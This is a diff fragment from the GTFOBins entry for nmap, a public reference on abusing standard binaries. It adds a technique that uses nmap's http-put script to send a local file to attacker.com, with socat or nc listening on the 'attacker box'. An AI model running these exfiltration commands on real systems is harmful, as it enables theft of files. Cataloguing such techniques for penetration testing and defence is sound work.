GTFOBins/GTFOBins.github.io/_gtfobins/nmap.md

         end;c:close();f:close();' > $TF
         nmap --script=$TF
   file-upload:
     - description: Send a file to a TCP port.
+Run `socat -v tcp-listen:8080,reuseaddr,fork - on the attacker box to collect the file or use a proper HTTP server.
+Note that multiple connections are made to the server.
+Also, it is important that the port is a commonly used HTTP like 80 or 8080.
+      code: |
+        RHOST=attacker.com
+        RPORT=8080
+        LFILE=file_to_send
+        nmap -p $RPORT $RHOST --script http-put --script-args http-put.url=/,http-put.file=$LFILE
+    - description: Send a file to a TCP port.
 Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
       code: |
         export RHOST=attacker.com